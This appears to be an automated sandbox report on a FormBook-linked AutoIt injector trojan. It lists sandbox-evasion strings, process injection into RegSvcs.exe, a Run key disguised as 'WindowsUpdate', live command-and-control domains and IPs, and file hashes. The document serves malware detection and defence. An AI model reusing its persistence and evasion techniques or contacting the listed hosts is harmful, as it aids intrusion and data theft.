Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EDE5F8 GetUserNameW,8_2_00EDE5F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EBBCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00EBBCF2
Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CA03BE GetVersionExW,0_2_00CA03BE
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: avqj.mp2.exe, 0000000F.00000003.2583976181.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587316445.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152493791.0000000001A73000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3026066360.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bdagent.exe
Source: avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2583976181.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587316445.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152493791.0000000001A73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AVGUI.exe
Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
Source: avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: regshot.exe

                Stealing of Sensitive Information

Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: avqj.mp2 | Binary or memory string: WIN_81
Source: avqj.mp2 | Binary or memory string: WIN_XP
Source: avqj.mp2.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: avqj.mp2 | Binary or memory string: WIN_XPe
Source: avqj.mp2 | Binary or memory string: WIN_VISTA
Source: avqj.mp2 | Binary or memory string: WIN_7
Source: avqj.mp2 | Binary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00F02163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_00F02163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00F01B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,8_2_00F01B61

MITRE ATT&CK Matrix

One row per matrix line, one cell per tactic column; a number in parentheses after a technique is the count badge shown next to it (matched signatures for that technique).

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (1) | Valid Accounts (2) | Native API (1) | Scripting (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | Input Capture (21) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (21) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Valid Accounts (2) | Valid Accounts (2) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Registry Run Keys / Startup Folder (1) | Access Token Manipulation (21) | Software Packing (1) | NTDS | System Information Discovery (27) | Distributed Component Object Model | Input Capture | Application Layer Protocol (1) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (312) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (261) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (1) | Masquerading (11) | Cached Domain Credentials | Virtualization/Sandbox Evasion (11) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (2) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (11) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (21) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (312) | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1586017, Sample: u549ed5dEA.exe, Start date: 08/01/2025, Architecture: WINDOWS, Score: 100
Contacted domains: www.supernutra01.online, www.127358.win
Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected Autoit Injector; 8 other signatures

Process tree (node IDs as numbered in the graph):
• u549ed5dEA.exe (10)
  • dropped: C:\Users\user\AppData\Local\Temp\...\avqj.mp2 (PE32); C:\Users\user\AppData\Local\Temp\...\itdo.vbe (Unicode)
  • signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  • wscript.exe (20)
    • signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    • cmd.exe (31)
      • avqj.mp2 (38)
        • dropped: C:\Users\user\ruum\avqj.mp2.exe (PE32); C:\Users\user\AppData\Local\...\avqj.mp2.exe (PE32); C:\Users\user\ruum\avqj.mp2 (PE32)
        • signatures: Found API chain indicative of sandbox detection; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures
        • RegSvcs.exe (52)
        • RegSvcs.exe (54)
      • conhost.exe (42)
    • cmd.exe (33)
      • signature: Uses ipconfig to lookup or modify the Windows network settings
      • conhost.exe (44)
      • ipconfig.exe (46)
    • cmd.exe (36)
      • conhost.exe (48)
      • ipconfig.exe (50)
• avqj.mp2.exe (14)
  • dropped: C:\Users\user\ruum\avqj.mp2.exe.exe (PE32)
  • signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  • RegSvcs.exe (23)
  • RegSvcs.exe (25)
• avqj.mp2.exe (16)
  • RegSvcs.exe (27)
  • RegSvcs.exe (29)
• avqj.mp2.exe (18)

Source: u549ed5dEA.exe, Detection: 61%, Scanner: ReversingLabs, Label: Win32.Trojan.Runner

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, Detection: 0%, Scanner: ReversingLabs
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2.exe, Detection: 0%, Scanner: ReversingLabs
Source: C:\Users\user\ruum\avqj.mp2, Detection: 0%, Scanner: ReversingLabs
Source: C:\Users\user\ruum\avqj.mp2.exe, Detection: 0%, Scanner: ReversingLabs
Source: C:\Users\user\ruum\avqj.mp2.exe.exe, Detection: 0%, Scanner: ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name: www.127358.win, IP: 206.238.89.119, Active: true, Malicious: false, Reputation: high
Name: www.supernutra01.online, IP: 188.114.96.3, Active: true, Malicious: false, Reputation: high
Name: http://www.autoitscript.com/autoit3/J, Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000000.2196955869.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2586770726.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3151702741.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 00000014.00000000.2644570578.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.dr, Malicious: false, Reputation: high
Name: https://www.autoitscript.com/autoit3/, Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.dr, Malicious: false, Reputation: high
                        No contacted IP infos
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1586017
                        Start date and time:2025-01-08 16:18:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 3s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Sample name:u549ed5dEA.exe
                        renamed because original name is a hash value
                        Original Sample Name:f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@33/70@2/0
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 97%
                        • Number of executed functions: 185
                        • Number of non-executed functions: 222
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • VT rate limit hit for: u549ed5dEA.exe
Time: 10:19:18, Type: API Interceptor, Description: 1x Sleep call for process: u549ed5dEA.exe modified
Time: 16:19:24, Type: Autostart, Description: Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls
Time: 16:19:37, Type: Autostart, Description: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls
Time: 16:19:48, Type: Autostart, Description: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls
                        No context
Match: www.127358.win
• Associated Sample: Quotation Request-349849.exe, Detection: malicious, Threat Name: FormBook, Context: 206.238.89.119
• Associated Sample: QUOTATON-37839993.exe, Detection: malicious, Threat Name: FormBook, Context: 206.238.89.119
• Associated Sample: lgkWBwqY15.exe, Detection: malicious, Threat Name: FormBook, Context: 206.238.89.119
• Associated Sample: Order MEI PO IM202411484.exe, Detection: malicious, Threat Name: FormBook, Context: 206.238.89.119
• Associated Sample: IETC-24017.exe, Detection: malicious, Threat Name: FormBook, PureLog Stealer, Context: 206.238.89.119
• Associated Sample: need quotations.exe, Detection: malicious, Threat Name: FormBook, Context: 206.238.89.119
Match: www.supernutra01.online
• Associated Sample: ORDER - 401.exe, Detection: malicious, Threat Name: FormBook, Context: 172.67.220.36
• Associated Sample: 01152-11-12-24.exe, Detection: malicious, Threat Name: FormBook, Context: 104.21.24.198
• Associated Sample: DRAFT COPY BL, CI & PL.exe, Detection: malicious, Threat Name: FormBook, Context: 172.67.220.36
• Associated Sample: PO_1111101161.vbs, Detection: malicious, Threat Name: FormBook, Context: 104.21.24.198
• Associated Sample: PAYMENT_ADVICE.exe, Detection: malicious, Threat Name: FormBook, Context: 104.21.24.198
• Associated Sample: Payment-251124.exe, Detection: malicious, Threat Name: FormBook, Context: 104.21.24.198
• Associated Sample: DO-COSU6387686280.pdf.exe, Detection: malicious, Threat Name: FormBook, PureLog Stealer, Context: 104.21.24.198
• Associated Sample: CV Lic H&S Olivetti Renzo.exe, Detection: malicious, Threat Name: FormBook, Context: 172.67.220.36
• Associated Sample: CV Lic H&S Olivetti Renzo.exe, Detection: malicious, Threat Name: FormBook, Context: 172.67.220.36
• Associated Sample: Project Breakdown Doc.exe, Detection: malicious, Threat Name: FormBook, Context: 172.67.220.36
                        No context
                        No context
Match: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
• Associated Sample: 1wYGO0mAN2.exe, Detection: malicious, Threat Name: AsyncRAT
• Associated Sample: yjOJ1YK5M3.exe, Detection: malicious, Threat Name: AsyncRAT
• Associated Sample: Rage.exe, Detection: malicious, Threat Name: Unknown
• Associated Sample: Rage.exe, Detection: malicious, Threat Name: Unknown
• Associated Sample: copia111224mp.hta, Detection: malicious, Threat Name: Unknown
• Associated Sample: FX6KTgnipP.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample: uhbrQkYNzx.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample: qPLzfnxGbj.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample: ngPebbPhbp.exe, Detection: malicious, Threat Name: RHADAMANTHYS
• Associated Sample: FS04dlvJrq.exe, Detection: malicious, Threat Name: FormBook
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):594
                                            Entropy (8bit):5.507408293701256
                                            Encrypted:false
                                            SSDEEP:12:ZiJN6NXVBVmhTFFBPSxXjvwF4CPtPEqcNM/DjeUmVI8oX0Q:oN6NXHEBFFgXj4nPtsjMHoI8c0Q
                                            MD5:B88AEBA366E943BAD395D31552AB26CF
                                            SHA1:278159E50CB4F4366E25E0BFC68908ED4B9F90FC
                                            SHA-256:7216D27B6B287635CF958E6EC3A70EB2AF8D931CFBE98D9BD283A7E97A07C998
                                            SHA-512:0EA99A1CF2FB2B4DAA4CCB45161554AD067D77AB7C216BF8933261A9E9CD26F3ABA8F0442D1833956561ECD94AAC243394F6AA9E06846D3B8058C5679845BF54
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):670
                                            Entropy (8bit):5.597883776857722
                                            Encrypted:false
                                            SSDEEP:12:IXZJmIILZCChnctXTSlpICrBP0VSFdX13/IewTbe5rqx2nRFcRsaTMHTSRrBPc:IXZsIIFbhctDSlpICrmMdF3/I9betPUq
                                            MD5:F112FCC371CBFB12796BFA2212039663
                                            SHA1:8326FDD102E399A0FA537A4AC52FCFE5360EF907
                                            SHA-256:2E3E1E2D4DBA918789092E53E24AD6A92A03E0A09122A1C8F7303BCE86112D93
                                            SHA-512:ACA9965AA95547B7B0DF1C4E3910EA1827435BB4AB960E47E66B02816F2A33A4E2B76C6345B3A4F2FD41F32311FE013C74ECCC5470F0C710AC13223B6291E498
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):947288
                                            Entropy (8bit):6.629681466265794
                                            Encrypted:false
                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
• Filename: 1wYGO0mAN2.exe, Detection: malicious
• Filename: yjOJ1YK5M3.exe, Detection: malicious
• Filename: Rage.exe, Detection: malicious
• Filename: Rage.exe, Detection: malicious
• Filename: copia111224mp.hta, Detection: malicious
• Filename: FX6KTgnipP.exe, Detection: malicious
• Filename: uhbrQkYNzx.exe, Detection: malicious
• Filename: qPLzfnxGbj.exe, Detection: malicious
• Filename: ngPebbPhbp.exe, Detection: malicious
• Filename: FS04dlvJrq.exe, Detection: malicious
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):947288
                                            Entropy (8bit):6.629681466265794
                                            Encrypted:false
                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):122214412
                                            Entropy (8bit):7.090094286382183
                                            Encrypted:false
                                            SSDEEP:49152:tLe6UYaLCBjCSgCN3TmQRMMpVPDWbQtL3PUa8TfTqul5Pa0JxnZAdrBcNBqu3QRb:b
                                            MD5:592AAF7AE0777B3173CFBB4D04C15DF8
                                            SHA1:CD6104DCC2D35EA01E30EBDF48556FE7256D14B5
                                            SHA-256:5691F5E0DC26586D217400C04331D2BFDF334868C9E53EAD09548B38F1FE31C1
                                            SHA-512:E5756FDC46E849FDB2FB2AB4AE6F2475B783E13D58C6EC1E35AA5D5A7CC9C98849E966C5EA7D4571960AA357538150A4165359CB4EBAC45CD618DFAFB2E59021
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):577
                                            Entropy (8bit):5.640429072038616
                                            Encrypted:false
                                            SSDEEP:12:KzK5kVs9MroNFATPrBPSlN1RSzar9OQz9987zYrBPsU5IFsBxDOEW5DX9XrTPh:Km5kVtX0NbSzEOc9HrV5weFQ5L9J
                                            MD5:F5A3546A93EF257DF068E0183A6BE09A
                                            SHA1:005DFFFAED36B3161EC8957D9E4DBB4D9F62999E
                                            SHA-256:A020A025B6515668596CBA7B29F7D59E0FDCC868FEB7CE921122CCB169D1E957
                                            SHA-512:491922F37C2F14DD0DA11005A0C037EA4CCC16B70E2F6221303F04C007F943BD8EC2DA8F38CCF90D9F7E2B35910A1E36FD46E3153A9859C22A020F12841BF14C
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):611
                                            Entropy (8bit):5.616959606642095
                                            Encrypted:false
                                            SSDEEP:12:ucVB/2TDK48htLgPdCGPKZMcz1qGmcuN0E1308XyyBM0aJnp0:uk/2TuTbLoAfl8ouNXTMl9p0
                                            MD5:5E6C2647A97A583AC8F0458C69AA0682
                                            SHA1:8394116D40D013C7A4776B96C980B665C82C8171
                                            SHA-256:F63996739B631500B68326D0DE1FDAEDBF874072ADBCF63FA08FEB5A9E140E35
                                            SHA-512:B391F6CFA533D6D6B150BEDF87E9DB5F156D82649D7C8F9EBF75695100963852361F9DBA6BADCC67344F6F65B4903E7D4267154214599C8F4E41530FD94A77A0
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):547
                                            Entropy (8bit):5.537995121972547
                                            Encrypted:false
                                            SSDEEP:12:GGqnUABT2bnRxbzlg/eAZF87/ukBRdHGLF:GGqnUABTK/eNZFMGkBn6F
                                            MD5:244237D5001A3F2E94718441A5827707
                                            SHA1:204AA66EC17B4A36C9E506ED06396C6E9406D791
                                            SHA-256:2DD862795F83E17ED4868ACD1E01285E03DC05EF479E112CF6B8F8EF069218FA
                                            SHA-512:61F641408030AC6A8AA19CA26A76BF772DC2DADFD2A4EB93351A1B58B37D7CB03DB93BC0084B006A8B8F96FD54C6F43E45ABD56905F6682E410CB4312EF6F085
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):602
                                            Entropy (8bit):5.481262288382369
                                            Encrypted:false
                                            SSDEEP:12:8rBGglKFSqsmRRjPUDMWZThrQSC3r5WFThwBg3L:8rBGvAZDpu3UFNpL
                                            MD5:4BE1782DD75BEA42BD21D2CDB957D968
                                            SHA1:05D4EF3082D28664B95D40DE8BF44F2592B0A08D
                                            SHA-256:D5A56B384CFFC80A412150029EEE4093651A382F7850FF2069CAB1782B2D8CEE
                                            SHA-512:9E474360F86D242A5FC564A5CEE90E493803C7AB7ED9510DDB10472D62B17999D28717F6435EF6D0B8294A5EFDB98E4E94E4FC606486605D700E7BAF8E5FCCF1
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):537
                                            Entropy (8bit):5.613240557651606
